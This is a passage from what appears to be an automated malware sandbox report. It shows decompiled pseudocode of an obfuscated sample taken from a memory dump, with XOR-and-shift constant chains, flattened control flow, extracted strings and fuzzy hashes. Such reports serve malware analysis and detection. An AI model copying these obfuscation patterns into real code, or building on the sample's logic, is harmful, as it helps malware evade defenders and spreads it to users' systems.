				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				void* _t621;
				void* _t678;
				void* _t680;
				void* _t682;
				void* _t686;
				void* _t693;
				void* _t695;
				void* _t705;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t717;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				void* _t723;
				void* _t741;
				void* _t782;
				signed int _t799;
				void* _t800;
				signed int _t802;
				void* _t803;
				void* _t806;
				signed int* _t808;
				void* _t811;

				_push(0x20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E048E2523(_t621);
				_v24 = 0x577da5;
				_t808 =  &(( &_v280)[7]);
				_t806 = 0;
				_t705 = 0x992981b;
				_t802 = 0x46;
				_v24 = _v24 / _t802;
				_v24 = _v24 ^ 0x00013ff7;
				_v112 = 0x11ccad;
				_v112 = _v112 ^ 0x4655cea9;
				_t799 = 0x18;
				_v112 = _v112 / _t799;
				_v112 = _v112 ^ 0x02ed8015;
				_v192 = 0xb3435e;
				_v192 = _v192 ^ 0x5476ca73;
				_v192 = _v192 | 0x86afc529;
				_t711 = 0x41;
				_v192 = _v192 * 0x65;
				_v192 = _v192 ^ 0xcc9bf2c1;
				_v160 = 0xa26fd8;
				_v160 = _v160 | 0x1e457789;
				_v160 = _v160 + 0xffffff9a;
				_v160 = _v160 ^ 0x1ee77f73;
				_v116 = 0x30086e;
				_v116 = _v116 + 0x9b58;
				_v116 = _v116 | 0xa610ad2b;
				_v116 = _v116 ^ 0xa630afef;
				_v132 = 0xc7f8d9;
				_v132 = _v132 / _t711;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x00000c4e;
				_v188 = 0x68adba;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 + 0xdf5e;
				_v188 = _v188 + 0x578c;
				_v188 = _v188 ^ 0x000143ff;
				_v200 = 0xf08783;
				_t712 = 0x34;
				_v200 = _v200 * 0x47;
				_v200 = _v200 * 0x7e;
				_v200 = _v200 << 0xe;
				_v200 = _v200 ^ 0xdff58000;
				_v144 = 0x38ef5c;
				_t78 =  &_v144; // 0x38ef5c
				_v144 =  *_t78 * 0x3a;
				_t80 =  &_v144; // 0x38ef5c
				_v144 =  *_t80 / _t712;
				_v144 = _v144 ^ 0x003f8121;
				_v228 = 0xc2ca7f;
				_v228 = _v228 | 0xbadb225d;
				_v228 = _v228 * 0x34;
				_v228 = _v228 ^ 0xd260086f;
				_v228 = _v228 ^ 0x26cba9a3;
				_v220 = 0xfa4495;
				_v220 = _v220 | 0x88ca2f4f;
				_v220 = _v220 + 0xffff7be1;
				_v220 = _v220 ^ 0xf2c1623b;
				_v220 = _v220 ^ 0x7a3889fb;
				_v176 = 0x22196b;
				_t713 = 0x73;
				_v176 = _v176 * 7;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x0001dd63;
				_v276 = 0x98ec05;
				_v276 = _v276 >> 0xc;
				_v276 = _v276 * 0x68;
				_v276 = _v276 >> 3;
				_v276 = _v276 ^ 0x00067c57;
				_v68 = 0xae747d;
				_v68 = _v68 | 0x05124624;
				_v68 = _v68 ^ 0x05b231eb;
				_v280 = 0xf8d1c6;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xea15f9b4;
				_v280 = _v280 >> 0xb;
				_v280 = _v280 ^ 0x001d75af;
				_v268 = 0x7023c5;
				_v268 = _v268 * 0x30;
				_v268 = _v268 / _t713;
				_v268 = _v268 << 6;
				_v268 = _v268 ^ 0x0bb4a801;
				_v60 = 0xbac308;
				_v60 = _v60 + 0xffffe338;
				_v60 = _v60 ^ 0x00b6b7d0;
				_v36 = 0xecd648;
				_t714 = 5;
				_v36 = _v36 / _t714;
				_v36 = _v36 ^ 0x00254e20;
				_v260 = 0xd5088a;
				_v260 = _v260 * 0x6a;
				_v260 = _v260 + 0xffff6987;
				_v260 = _v260 * 0x35;
				_v260 = _v260 ^ 0x42f6e70f;
				_v136 = 0xbacd74;
				_v136 = _v136 + 0xffff36ec;
				_v136 = _v136 * 0x60;
				_v136 = _v136 ^ 0x45cdb8fa;
				_v52 = 0xc178d5;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x47c4a061;
				_v184 = 0x5699a9;
				_v184 = _v184 << 0xe;
				_v184 = _v184 >> 1;
				_v184 = _v184 ^ 0x5335f667;
				_v156 = 0x881879;
				_v156 = _v156 + 0xffff87c5;
				_v156 = _v156 >> 0xe;
				_v156 = _v156 ^ 0x00013456;
				_v164 = 0xdfb2f6;
				_v164 = _v164 + 0xffff49bb;
				_v164 = _v164 ^ 0x6eb2aa12;
				_v164 = _v164 ^ 0x6e63c6eb;
				_v168 = 0x3b644e;
				_v168 = _v168 + 0xffff1ea7;
				_v168 = _v168 * 0x2f;
				_v168 = _v168 ^ 0x0ab0038a;
				_v236 = 0x555e72;
				_v236 = _v236 << 5;
				_v236 = _v236 + 0xffffce11;
				_v236 = _v236 >> 2;
				_v236 = _v236 ^ 0x02a9ef11;
				_v244 = 0xb4615f;
				_v244 = _v244 << 8;
				_v244 = _v244 ^ 0xaac634ac;
				_v244 = _v244 >> 9;
				_v244 = _v244 ^ 0x0001a936;
				_v252 = 0x84c56d;
				_v252 = _v252 | 0xe0c7380e;
				_t715 = 0x71;
				_v252 = _v252 * 0x7b;
				_v252 = _v252 / _t715;
				_v252 = _v252 ^ 0x0001e627;
				_v208 = 0x743a3c;
				_v208 = _v208 >> 0x10;
				_v208 = _v208 | 0x81de5d6a;
				_v208 = _v208 / _t802;
				_v208 = _v208 ^ 0x01d76d7e;
				_v44 = 0xfd85af;
				_v44 = _v44 | 0x7ab2340b;
				_v44 = _v44 ^ 0x7af9a8fa;
				_v172 = 0x5349dc;
				_t716 = 0x5c;
				_v172 = _v172 / _t716;
				_v172 = _v172 ^ 0xbfe72ba3;
				_v172 = _v172 ^ 0xbfee364a;
				_v128 = 0x52087a;
				_v128 = _v128 + 0xffffb2ae;
				_v128 = _v128 >> 8;
				_v128 = _v128 ^ 0x000925e5;
				_v248 = 0xc44695;
				_t717 = 0x70;
				_v248 = _v248 * 0x17;
				_v248 = _v248 << 0xd;
				_v248 = _v248 | 0x603c27a6;
				_v248 = _v248 ^ 0x6af21839;
				_v92 = 0x408d93;
				_v92 = _v92 * 0x35;
				_v92 = _v92 + 0xffff7249;
				_v92 = _v92 ^ 0x0d559f7d;
				_v256 = 0xd73509;
				_v256 = _v256 ^ 0x0cacdd47;
				_v256 = _v256 + 0x42fa;
				_v256 = _v256 << 6;
				_v256 = _v256 ^ 0x1f021d73;
				_v224 = 0x764ce4;
				_v224 = _v224 + 0x42fd;
				_v224 = _v224 >> 7;
				_v224 = _v224 + 0xffff86a8;
				_v224 = _v224 ^ 0x0003f000;
				_v264 = 0x8469fa;
				_v264 = _v264 ^ 0xa8d95880;
				_v264 = _v264 + 0xffff86fa;
				_v264 = _v264 << 5;
				_v264 = _v264 ^ 0x0b916974;
				_v216 = 0x2c2bd1;
				_v216 = _v216 + 0xe15a;
				_v216 = _v216 * 5;
				_v216 = _v216 / _t717;
				_v216 = _v216 ^ 0x000677ad;
				_v96 = 0xa27b9c;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0xffffdc19;
				_v96 = _v96 ^ 0xfff1defb;
				_v76 = 0x29665d;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0000f928;
				_v104 = 0x3dd3f8;
				_v104 = _v104 ^ 0x29d7c804;
				_v104 = _v104 + 0xffff0fcf;
				_v104 = _v104 ^ 0x29ec2a6e;
				_v232 = 0xd7cd53;
				_v232 = _v232 + 0xfffff316;
				_v232 = _v232 >> 0xd;
				_t718 = 0x37;
				_v232 = _v232 / _t718;
				_v232 = _v232 ^ 0x00026ebe;
				_v88 = 0x9f762f;
				_v88 = _v88 ^ 0x53088056;
				_v88 = _v88 ^ 0x5398c5d6;
				_v48 = 0x778408;
				_t719 = 0x1a;
				_v48 = _v48 * 0xa;
				_v48 = _v48 ^ 0x04a827e3;
				_v124 = 0xf41155;
				_v124 = _v124 / _t799;
				_v124 = _v124 | 0x4c675d60;
				_v124 = _v124 ^ 0x4c69a558;
				_v56 = 0x52fde7;
				_v56 = _v56 + 0xffffaaf0;
				_v56 = _v56 ^ 0x00584a4f;
				_v196 = 0x1209af;
				_v196 = _v196 + 0xdc05;
				_v196 = _v196 / _t719;
				_v196 = _v196 | 0xd87443c0;
				_v196 = _v196 ^ 0xd871b909;
				_v204 = 0x605434;
				_v204 = _v204 << 7;
				_v204 = _v204 << 0xf;
				_v204 = _v204 | 0x30836e67;
				_v204 = _v204 ^ 0x3d8b23ec;
				_v212 = 0x15d47d;
				_v212 = _v212 ^ 0x7b3a671b;
				_v212 = _v212 | 0xac8ef607;
				_v212 = _v212 + 0x7fea;
				_v212 = _v212 ^ 0xffb55c3c;
				_v140 = 0x9bf75a;
				_v140 = _v140 << 0x10;
				_v140 = _v140 + 0x980c;
				_v140 = _v140 ^ 0xf75cd8ff;
				_v240 = 0xf72558;
				_t720 = 0x54;
				_v240 = _v240 * 0x29;
				_v240 = _v240 << 4;
				_v240 = _v240 | 0x19e98343;
				_v240 = _v240 ^ 0x79e49fd7;
				_v32 = 0xa2f12d;
				_v32 = _v32 * 0x66;
				_v32 = _v32 ^ 0x40e2559c;
				_v120 = 0x74c948;
				_v120 = _v120 / _t720;
				_v120 = _v120 ^ 0x8b74ab3a;
				_v120 = _v120 ^ 0x8b7a945b;
				_t800 = 0xe9dac92;
				_v152 = 0x240c06;
				_t803 = 0xa65db9b;
				_v152 = _v152 ^ 0x96489e26;
				_v152 = _v152 ^ 0x2db1745a;
				_v152 = _v152 ^ 0xbbd649e4;
				_v148 = 0x7dbe27;
				_v148 = _v148 + 0xffffa075;
				_v148 = _v148 + 0x8100;
				_v148 = _v148 ^ 0x0074932c;
				_v84 = 0x6924e8;
				_t721 = 0x16;
				_v84 = _v84 * 3;
				_v84 = _v84 ^ 0x0130d0dd;
				_v28 = 0x7106b;
				_v28 = _v28 + 0xffff4dfa;
				_v28 = _v28 ^ 0x00040a0c;
				_v100 = 0xd5105b;
				_v100 = _v100 << 6;
				_v100 = _v100 + 0xffff04b2;
				_v100 = _v100 ^ 0x35448819;
				_v272 = 0x7ab441;
				_v272 = _v272 / _t721;
				_v272 = _v272 + 0xc85c;
				_v272 = _v272 + 0x5f14;
				_v272 = _v272 ^ 0x000463e3;
				_v64 = 0x232f31;
				_t722 = 0x61;
				_v64 = _v64 / _t722;
				_v64 = _v64 ^ 0x0005b08c;
				_v72 = 0xab1849;
				_v72 = _v72 + 0xffffcb3b;
				_v72 = _v72 ^ 0x00af2a02;
				_v80 = 0x951c37;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x000db97f;
				_v180 = 0x3fe48a;
				_v180 = _v180 + 0xe0fe;
				_v180 = _v180 | 0x43b6596f;
				_v180 = _v180 ^ 0x43f3ab9c;
				_v108 = 0x948ae2;
				_v108 = _v108 ^ 0xfc9d698e;
				_v108 = _v108 ^ 0x8192bcc5;
				_v108 = _v108 ^ 0x7d9d4cd7;
				_v40 = 0x5ab0e0;
				_v40 = _v40 * 0x46;
				_v40 = _v40 ^ 0x18c5c44a;
				while(1) {
					L1:
					_t678 = 0xd5afe1a;
					while(1) {
						L2:
						_t723 = 0x9b1e4fa;
						_t782 = 0x491e516;
						do {
							while(1) {
								L3:
								_t811 = _t705 - 0xa39355c;
								if(_t811 > 0) {
									break;
								}
								if(_t811 == 0) {
									_push(_v280);
									_push(0x48c1070);
									_t686 = E048C3F5C(_v276, _v68, __eflags);
									_push(_v36);
									_push(0x48c1030);
									__eflags = E048D54FD(_v260,  &_v16, _t686, _v136, _v52, _v24, _v184, E048C3F5C(_v268, _v60, __eflags)) - _v112;
									_t705 =  ==  ? 0x491e516 : 0xbb35261;
									E048E0352(_v156, _v164, _t686, _v168);
									E048E0352(_v236, _v244, _t687, _v252);
									_t808 =  &(_t808[0xe]);
									_t800 = 0xe9dac92;
									goto L14;
								} else {
									if(_t705 == 0x35fff8c) {
										_t693 = E048E002C(_a12, _v200, _v240, _v32, _v120, _a16, _v20, _v152);
										_t808 =  &(_t808[6]);
										__eflags = _t693 - _v144;
										_t678 = 0xd5afe1a;
										_t705 =  ==  ? 0xd5afe1a : 0x91eac5c;
										goto L2;
									} else {
										if(_t705 == _t782) {
											_push(_v172);
											_t695 = E048C3F5C(_v208, _v44, __eflags);
											_t741 = 0x48c10a0;
											__eflags = E048D55BD( &_v4,  &_v8, _t695, _v128, _t741, _v16, _v248, _v92, _v192, _v256, _v224, _v264) - _v160;
											_t705 =  ==  ? 0x9b1e4fa : _t800;
											E048E0352(_v216, _v96, _t695, _v76);
											_t808 =  &(_t808[0xc]);
											L14:
											_t803 = 0xa65db9b;
											L28:
											_t678 = 0xd5afe1a;
											_t723 = 0x9b1e4fa;
											_t782 = 0x491e516;
											goto L29;
										} else {
											if(_t705 == 0x91eac5c) {
												E048D18C8(_v100, _v272, _v20);
												_t705 = 0xc82d562;
												while(1) {
													L1:
													_t678 = 0xd5afe1a;
													goto L2;
												}
											} else {
												if(_t705 == 0x992981b) {
													_t705 = 0xa39355c;
													continue;
												} else {
													if(_t705 != _t723) {
														goto L29;
													} else {
														_push(_t723);
														_v12 = E048CF38A(_v8);
														_t705 =  !=  ? _t803 : _t800;
														while(1) {
															L1:
															_t678 = 0xd5afe1a;
															L2:
															_t723 = 0x9b1e4fa;
															_t782 = 0x491e516;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L22:
								return _t806;
							}
							__eflags = _t705 - _t803;
							if(_t705 == _t803) {
								_t680 = E048D3B54(_v8, _v48, _v12, _v116, _v16, _v124, _t723,  &_v20, _v56, _v132, _v196, _v204, _v212, _v140);
								_t808 =  &(_t808[0xc]);
								__eflags = _t680 - _v188;
								if(__eflags != 0) {
									_t705 = 0xc82d562;
									goto L28;
								} else {
									_t705 = 0x35fff8c;
									goto L1;
								}
							} else {
								__eflags = _t705 - 0xc82d562;
								if(_t705 == 0xc82d562) {
									E048C2043(_v12, _v64, _v72, _v80);
									_t705 = _t800;
									while(1) {
										L1:
										_t678 = 0xd5afe1a;
										goto L2;
									}
								} else {
									__eflags = _t705 - _t678;
									if(_t705 == _t678) {
										_t682 = E048D3802(_v148, _v84, _v20, _v28, 0x20, _a8, _v228);
										_t808 =  &(_t808[5]);
										_t705 = 0x91eac5c;
										__eflags = _t682 - _v220;
										_t806 =  ==  ? 1 : _t806;
										while(1) {
											L1:
											_t678 = 0xd5afe1a;
											goto L2;
										}
									} else {
										__eflags = _t705 - _t800;
										if(_t705 != _t800) {
											goto L29;
										} else {
											E048C2153(_v176, _v180, _v108, _v16, _v40);
										}
									}
								}
							}
							goto L22;
							L29:
							__eflags = _t705 - 0xbb35261;
						} while (__eflags != 0);
						goto L22;
					}
				}
			}

0x048c5abc
0x048c5abe
0x048c5ac5
0x048c5acc
0x048c5ad3
0x048c5ada
0x048c5adb
0x048c5adc
0x048c5ae1
0x048c5aec
0x048c5af8
0x048c5afa
0x048c5b01
0x048c5b06
0x048c5b0f
0x048c5b1a
0x048c5b25
0x048c5b37
0x048c5b3c
0x048c5b45
0x048c5b50
0x048c5b58
0x048c5b60
0x048c5b6d
0x048c5b70
0x048c5b74
0x048c5b7c
0x048c5b87
0x048c5b92
0x048c5b9a
0x048c5ba5
0x048c5bb0
0x048c5bbb
0x048c5bc6
0x048c5bd1
0x048c5be7
0x048c5bee
0x048c5bf6
0x048c5c01
0x048c5c09
0x048c5c0e
0x048c5c16
0x048c5c1e
0x048c5c26
0x048c5c33
0x048c5c34
0x048c5c3d
0x048c5c41
0x048c5c46
0x048c5c4e
0x048c5c59
0x048c5c61
0x048c5c68
0x048c5c71
0x048c5c78
0x048c5c83
0x048c5c8b
0x048c5c98
0x048c5c9c
0x048c5ca6
0x048c5cae
0x048c5cb6
0x048c5cbe
0x048c5cc6
0x048c5cce
0x048c5cd6
0x048c5ce5
0x048c5ce8
0x048c5cec
0x048c5cf1
0x048c5cf9
0x048c5d01
0x048c5d0b
0x048c5d0f
0x048c5d14
0x048c5d1c
0x048c5d27
0x048c5d32
0x048c5d3d
0x048c5d4a
0x048c5d4e
0x048c5d56
0x048c5d5b
0x048c5d63
0x048c5d70
0x048c5d7c
0x048c5d80
0x048c5d85
0x048c5d8d
0x048c5d98
0x048c5da3
0x048c5dae
0x048c5dc0
0x048c5dc3
0x048c5dca
0x048c5dd5
0x048c5de2
0x048c5de6
0x048c5df3
0x048c5df7
0x048c5dff
0x048c5e0a
0x048c5e1d
0x048c5e24
0x048c5e2f
0x048c5e42
0x048c5e49
0x048c5e54
0x048c5e5c
0x048c5e61
0x048c5e65
0x048c5e6d
0x048c5e78
0x048c5e83
0x048c5e8b
0x048c5e96
0x048c5ea1
0x048c5eac
0x048c5eb7
0x048c5ec2
0x048c5ecd
0x048c5ee0
0x048c5ee7
0x048c5ef4
0x048c5efc
0x048c5f01
0x048c5f09
0x048c5f0e
0x048c5f16
0x048c5f1e
0x048c5f23
0x048c5f2b
0x048c5f30
0x048c5f38
0x048c5f40
0x048c5f4f
0x048c5f52
0x048c5f5e
0x048c5f62
0x048c5f6a
0x048c5f72
0x048c5f77
0x048c5f87
0x048c5f8b
0x048c5f93
0x048c5f9e
0x048c5fa9
0x048c5fb4
0x048c5fc6
0x048c5fcb
0x048c5fd4
0x048c5fdf
0x048c5fea
0x048c5ff5
0x048c6000
0x048c6008
0x048c6013
0x048c6020
0x048c6021
0x048c6025
0x048c602a
0x048c6032
0x048c603a
0x048c604d
0x048c6054
0x048c605f
0x048c606a
0x048c6072
0x048c607a
0x048c6082
0x048c6087
0x048c608f
0x048c6097
0x048c609f
0x048c60a4
0x048c60ac
0x048c60b4
0x048c60bc
0x048c60c4
0x048c60cc
0x048c60d1
0x048c60d9
0x048c60e1
0x048c60ee
0x048c60f8
0x048c60fe
0x048c6106
0x048c6111
0x048c6119
0x048c6124
0x048c612f
0x048c613a
0x048c6142
0x048c614d
0x048c6158
0x048c6163
0x048c616e
0x048c6179
0x048c6181
0x048c6189
0x048c6194
0x048c6199
0x048c619d
0x048c61a5
0x048c61b0
0x048c61bb
0x048c61c6
0x048c61db
0x048c61de
0x048c61e5
0x048c61f0
0x048c6206
0x048c620d
0x048c6218
0x048c6223
0x048c622e
0x048c6239
0x048c6244
0x048c624c
0x048c625c
0x048c6260
0x048c6268
0x048c6270
0x048c6278
0x048c627d
0x048c6282
0x048c628a
0x048c6292
0x048c629a
0x048c62a2
0x048c62aa
0x048c62b2
0x048c62ba
0x048c62c5
0x048c62cd
0x048c62d8
0x048c62e3
0x048c62f0
0x048c62f1
0x048c62f5
0x048c62fa
0x048c6302
0x048c630a
0x048c631d
0x048c6324
0x048c632f
0x048c6343
0x048c634a
0x048c6357
0x048c6362
0x048c6367
0x048c6372
0x048c6377
0x048c6382
0x048c638d
0x048c6398
0x048c63a3
0x048c63ae
0x048c63b9
0x048c63c4
0x048c63d9
0x048c63dc
0x048c63e3
0x048c63ee
0x048c63f9
0x048c6404
0x048c640f
0x048c641a
0x048c6422
0x048c642d
0x048c6438
0x048c6448
0x048c644c
0x048c6454
0x048c645c
0x048c6464
0x048c6476
0x048c6479
0x048c6480
0x048c648b
0x048c6496
0x048c64a1
0x048c64ac
0x048c64b7
0x048c64bf
0x048c64ca
0x048c64d2
0x048c64da
0x048c64e2
0x048c64ea
0x048c64f5
0x048c6500
0x048c650b
0x048c6516
0x048c6529
0x048c6530
0x048c653b
0x048c653b
0x048c653b
0x048c6540
0x048c6540
0x048c6540
0x048c6545
0x048c654a
0x048c654a
0x048c654a
0x048c654a
0x048c6550
0x00000000
0x00000000
0x048c6556
0x048c66ca
0x048c66d9
0x048c66de
0x048c66e3
0x048c66f7
0x048c673f
0x048c675b
0x048c675f
0x048c6771
0x048c6776
0x048c6779
0x00000000
0x048c655c
0x048c6562
0x048c66a5
0x048c66ac
0x048c66bb
0x048c66bd
0x048c66c2
0x00000000
0x048c6568
0x048c656a
0x048c65de
0x048c65f2
0x048c65f8
0x048c6644
0x048c665d
0x048c6661
0x048c6666
0x048c6669
0x048c6669
0x048c68bf
0x048c68bf
0x048c68c4
0x048c68c9
0x00000000
0x048c656c
0x048c6572
0x048c65ce
0x048c65d4
0x048c653b
0x048c653b
0x048c653b
0x00000000
0x048c653b
0x048c6574
0x048c657a
0x048c65b5
0x00000000
0x048c657c
0x048c657e
0x00000000
0x048c6584
0x048c6596
0x048c65a5
0x048c65b0
0x048c653b
0x048c653b
0x048c653b
0x048c6540
0x048c6540
0x048c6545
0x00000000
0x048c6545
0x048c653b
0x048c657e
0x048c657a
0x048c6572
0x048c656a
0x048c6562
0x048c67d0
0x048c67da
0x048c67da
0x048c6783
0x048c6785
0x048c68a2
0x048c68a7
0x048c68aa
0x048c68ae
0x048c68ba
0x00000000
0x048c68b0
0x048c68b0
0x00000000
0x048c68b0
0x048c678b
0x048c678b
0x048c6791
0x048c6840
0x048c6847
0x048c653b
0x048c653b
0x048c653b
0x00000000
0x048c653b
0x048c6797
0x048c6797
0x048c6799
0x048c6804
0x048c6812
0x048c6815
0x048c681a
0x048c681c
0x048c653b
0x048c653b
0x048c653b
0x00000000
0x048c653b
0x048c679b
0x048c679b
0x048c679d
0x00000000
0x048c67a3
0x048c67c6
0x048c67cb
0x048c679d
0x048c6799
0x048c6791
0x00000000
0x048c68ce
0x048c68ce
0x048c68ce
0x00000000
0x048c68da
0x048c6540

Strings

OJX, xrefs: 048C6239
`]gL, xrefs: 048C620D
\8, xrefs: 048C5C59
\59, xrefs: 048C654A
4T`, xrefs: 048C6270
r^U, xrefs: 048C5EF4
Nd;, xrefs: 048C5EC2
%, xrefs: 048C6008
n*), xrefs: 048C616E
N%, xrefs: 048C5DCA
<:t, xrefs: 048C5F6A
]f), xrefs: 048C612F
Z, xrefs: 048C60E1
$i, xrefs: 048C63C4
Lv, xrefs: 048C608F
1/#, xrefs: 048C6464
\59, xrefs: 048C65B5

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: N%$1/#$4T`$<:t$Nd;$OJX$Z$\59$\59$\8$]f)$`]gL$n*)$r^U$$i$%$Lv
API String ID: 0-3581384141
Opcode ID: c3f2f51756d5e942b31daeb4f94ab9170445086e1ffb87426e79eae7624bac59
Instruction ID: 8fbf6f9577586b16c06312dbde6429757e52411f1e0c450164dfc69d4e4aa453
Opcode Fuzzy Hash: c3f2f51756d5e942b31daeb4f94ab9170445086e1ffb87426e79eae7624bac59
Instruction Fuzzy Hash: 7862FE715083819BD3B8CF25C48AB9BBBE2BBC4308F108E1DE5DA96260D7B19549CF47

Uniqueness

Uniqueness Score: -1.00%

Function 048D7ED1, Relevance: 20.7, Strings: 16, Instructions: 706
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E048D7ED1(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr* _v96;
				char _v100;
				void _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t812;
				void* _t816;
				void* _t819;
				void* _t827;
				void* _t831;
				void* _t839;
				void* _t846;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				void* _t877;
				void* _t939;
				intOrPtr* _t959;
				signed int _t961;
				void* _t962;
				intOrPtr _t966;
				void* _t967;
				void* _t971;

				_t959 = __ecx;
				_v96 = __ecx;
				_v88 = 0x4b308c;
				_v84 = 0x68a357;
				_t966 = 0;
				_v80 = 0;
				_t846 = 0x5095c78;
				_v380 = 0x65a42d;
				_v380 = _v380 >> 5;
				_t853 = 0x2a;
				_v380 = _v380 / _t853;
				_v380 = _v380 << 0xc;
				_v380 = _v380 ^ 0x0135c000;
				_v348 = 0xa5d38e;
				_v348 = _v348 + 0xb9c5;
				_v348 = _v348 << 0xb;
				_t961 = 9;
				_v348 = _v348 * 0x52;
				_v348 = _v348 ^ 0xca24b000;
				_v140 = 0x8d3f77;
				_v140 = _v140 ^ 0x151b0181;
				_v140 = _v140 ^ 0x15963ef6;
				_v400 = 0x207a6e;
				_v400 = _v400 << 5;
				_v400 = _v400 << 8;
				_v400 = _v400 ^ 0x8b464bbd;
				_v400 = _v400 ^ 0x840b8bbd;
				_v312 = 0x1fa3da;
				_v312 = _v312 + 0x3108;
				_v312 = _v312 * 0x36;
				_v312 = _v312 ^ 0x06b6e7ac;
				_v276 = 0x748fc6;
				_v276 = _v276 + 0xffffe429;
				_v276 = _v276 | 0xa76916e4;
				_v276 = _v276 ^ 0xa77d77ef;
				_v340 = 0x455dfa;
				_v340 = _v340 ^ 0xe88bfa17;
				_v340 = _v340 + 0xffff2853;
				_v340 = _v340 ^ 0xe8cdd040;
				_v304 = 0xe2385b;
				_v304 = _v304 + 0xf051;
				_v304 = _v304 ^ 0x6c6e5fff;
				_v304 = _v304 ^ 0x6c8d7753;
				_v248 = 0xbb5b14;
				_v248 = _v248 | 0xf3fbf98f;
				_v248 = _v248 ^ 0xf3fbfb9f;
				_v368 = 0x2d4fd6;
				_v368 = _v368 ^ 0xbe47ef6a;
				_v368 = _v368 | 0x228e4a2b;
				_v368 = _v368 >> 0xf;
				_v368 = _v368 ^ 0x00017ddd;
				_v356 = 0x878a0;
				_v356 = _v356 ^ 0xc7db0bb3;
				_v356 = _v356 / _t961;
				_v356 = _v356 ^ 0x93ef2515;
				_v356 = _v356 ^ 0x85dcd542;
				_v224 = 0x4f8f83;
				_v224 = _v224 >> 0xd;
				_v224 = _v224 + 0xffff7127;
				_v224 = _v224 ^ 0xffff73a3;
				_v364 = 0xd913f0;
				_v364 = _v364 << 4;
				_v364 = _v364 + 0xffffe4f7;
				_v364 = _v364 << 6;
				_v364 = _v364 ^ 0x64479578;
				_v428 = 0x4a41b6;
				_v428 = _v428 * 0x17;
				_t854 = 0x3f;
				_v428 = _v428 / _t854;
				_v428 = _v428 + 0x4db3;
				_v428 = _v428 ^ 0x00190a3f;
				_v220 = 0x230254;
				_v220 = _v220 | 0x25a195ca;
				_v220 = _v220 ^ 0x25a440f4;
				_v164 = 0x79946d;
				_v164 = _v164 | 0x95db6f2a;
				_v164 = _v164 ^ 0x95f5ff2f;
				_v420 = 0x20555;
				_v420 = _v420 + 0x49a3;
				_v420 = _v420 + 0xffffbaa0;
				_v420 = _v420 | 0xe66c6006;
				_v420 = _v420 ^ 0xe66d9785;
				_v308 = 0x796a8b;
				_v308 = _v308 ^ 0xcf3f3c6d;
